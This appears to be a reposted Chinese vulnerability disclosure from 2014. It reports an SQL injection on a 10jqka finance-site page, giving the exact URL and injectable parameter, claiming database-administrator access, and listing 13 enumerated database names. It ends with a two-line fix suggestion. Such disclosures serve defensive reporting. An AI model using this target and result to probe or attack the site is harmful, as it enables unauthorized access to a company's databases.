同花顺某站SQL注入漏洞下载

来源:黑吧安全网 浏览:837次 时间:2014-05-14
做网站找雨过天晴工作室

地址:http://basic.10jqka.com.cn/interactive/stockall/000528/?seq=468053

dba权限

available databases [13]:
[*] baidu
[*] basic
[*] catch_data
[*] f10_news
[*] f10_toupiao
[*] information_schema
[*] keyword
[*] lilv
[*] mac
[*] mysql
[*] ncxg
[*] observation
[*] test



 

修复方案:

1. 过滤

2. 不忽略